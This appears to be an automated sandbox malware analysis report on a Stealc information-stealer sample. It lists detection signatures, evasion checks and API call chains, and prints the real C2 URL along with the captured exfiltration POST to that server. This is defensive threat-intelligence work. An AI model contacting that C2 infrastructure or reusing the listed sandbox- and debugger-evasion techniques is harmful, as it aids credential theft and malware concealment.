
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520589
MD5: ad0c6bd7353136531af5325034613533
SHA1: ee44d2b2e6ad3e32da9c074b5b880e4947c4970c
SHA256: 5947b0b670dbb94778390c83aeb091874f10cb952b2dc3c459ac0e23f380a523
Tags: exe, user-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6172 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AD0C6BD7353136531AF5325034613533)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2105603461.0000000005650000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6172 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6172 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
0.2.file.exe.ec0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T16:17:12.173171+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.ec0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECF68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIID | Host: 185.215.113.37 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 35 37 35 30 39 34 33 44 30 42 36 31 32 33 33 31 37 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a | Data Ascii: ------JKECFCFBGDHIECAAFIID Content-Disposition: form-data; name="hwid" CF5750943D0B612331747 ------JKECFCFBGDHIECAAFIID Content-Disposition: form-data; name="build" save ------JKECFCFBGDHIECAAFIID--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 9 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIID | Host: 185.215.113.37 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 35 37 35 30 39 34 33 44 30 42 36 31 32 33 33 31 37 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a | Data Ascii: ------JKECFCFBGDHIECAAFIID Content-Disposition: form-data; name="hwid" CF5750943D0B612331747 ------JKECFCFBGDHIECAAFIID Content-Disposition: form-data; name="build" save ------JKECFCFBGDHIECAAFIID--
Source: file.exe, 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2157800068.0000000001BC6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157800068.0000000001BB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2157800068.0000000001BB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/6t
Source: file.exe, 00000000.00000002.2157800068.0000000001BC6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157800068.0000000001BE1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2157800068.0000000001BC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.
Source: file.exe, 00000000.00000002.2157800068.0000000001BC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
Source: file.exe, 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37p

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129E95B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128C1B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A03D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129B32B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0116638E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129120A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011BD26B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0126EAFD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01297D17
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128DD91
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011FCDFA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A1FC2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012946EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128F6F9
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00EC45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: llbyxbem ZLIB complexity 0.9949982080354484
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\256HLV51.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1875456 > 1048576
Source: file.exe | Static PE information: Raw size of llbyxbem is bigger than: 0x100000 < 0x1a3a00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.ec0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;llbyxbem:EW;vndwcpmt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;llbyxbem:EW;vndwcpmt:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cf94b should be: 0x1d61a0
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: llbyxbem
Source: file.exe | Static PE information: section name: vndwcpmt
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012B0922 push 0E3C32F7h; mov dword ptr [esp], ebx (0_2_012B0815)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012B813F push eax; mov dword ptr [esp], 231F4C4Dh (0_2_012B81B1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012CA11E push edx; mov dword ptr [esp], 5F6745E3h (0_2_012CA141)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012CA11E push ecx; mov dword ptr [esp], 7FDE016Ah (0_2_012CA175)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012CA11E push ebx; mov dword ptr [esp], ebp (0_2_012CA1AA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012CA11E push 482FE650h; mov dword ptr [esp], ebp (0_2_012CA212)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0134A90D push 70183CF2h; mov dword ptr [esp], esi (0_2_0134A932)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0134A90D push 0ED78B4Bh; mov dword ptr [esp], ebp (0_2_0134A95C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push esi; mov dword ptr [esp], ebx (0_2_0128B1AB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push ecx; mov dword ptr [esp], 7DDCA5EBh (0_2_0128B1C1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push ebp; mov dword ptr [esp], edx (0_2_0128B1EA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push eax; mov dword ptr [esp], 5B5BC2F1h (0_2_0128B2D6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push 1A0BF2A8h; mov dword ptr [esp], ebp (0_2_0128B311)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push edx; mov dword ptr [esp], ebp (0_2_0128B31B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push 3D354340h; mov dword ptr [esp], eax (0_2_0128B482)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push esi; mov dword ptr [esp], 18819C58h (0_2_0128B4D4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push ebx; mov dword ptr [esp], esi (0_2_0128B5AA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push 19FF4F9Ah; mov dword ptr [esp], edx (0_2_0128B637)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push ecx; mov dword ptr [esp], 7EBF5DF6h (0_2_0128B63C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push 53200ED0h; mov dword ptr [esp], ebx (0_2_0128B684)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push edi; mov dword ptr [esp], 3FFE592Fh (0_2_0128B69B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push 59311D72h; mov dword ptr [esp], ebp (0_2_0128B6C6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push ebp; mov dword ptr [esp], 3CED0877h (0_2_0128B6CB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push edi; mov dword ptr [esp], edx (0_2_0128B75D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push eax; mov dword ptr [esp], esi (0_2_0128B7E1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push ebp; mov dword ptr [esp], edx (0_2_0128B883)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push esi; mov dword ptr [esp], eax (0_2_0128B8EC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push 2E35D8B9h; mov dword ptr [esp], ecx (0_2_0128BA66)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0128B17A push ebx; mov dword ptr [esp], 7FD7813Bh (0_2_0128BA6A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0132616D push ebx; mov dword ptr [esp], edi (0_2_01326186)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012CC14A push 2B5D8858h; mov dword ptr [esp], edi (0_2_012CC186)
Source: file.exe | Static PE information: section name: llbyxbem entropy: 7.9547357115051796

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13665)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1121B24 second address: 1121B46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F15490E9B96h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1121B46 second address: 1121B57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B2FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A724E second address: 12A725A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A725A second address: 12A7293 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F1548D0B2FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1548D0B301h 0x00000012 jmp 00007F1548D0B305h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A6321 second address: 12A632C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A6488 second address: 12A648D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A6762 second address: 12A676A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A676A second address: 12A676E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A920A second address: 12A92CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F15490E9B99h 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+122D2C5Dh] 0x00000015 jne 00007F15490E9B8Ch 0x0000001b push 00000000h 0x0000001d push E5C7AD44h 0x00000022 jmp 00007F15490E9B8Ch 0x00000027 add dword ptr [esp], 1A38533Ch 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F15490E9B88h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 push 00000003h 0x0000004a call 00007F15490E9B98h 0x0000004f movzx edx, si 0x00000052 pop edi 0x00000053 push 00000000h 0x00000055 add edi, 24DD6AEFh 0x0000005b push 00000003h 0x0000005d jmp 00007F15490E9B94h 0x00000062 push 97BEE970h 0x00000067 push eax 0x00000068 push edx 0x00000069 jbe 00007F15490E9B8Ch 0x0000006f jc 00007F15490E9B86h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A92CC second address: 12A92D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A9462 second address: 12A9468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A9468 second address: 12A946D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A946D second address: 12A9472 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A9522 second address: 12A9527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
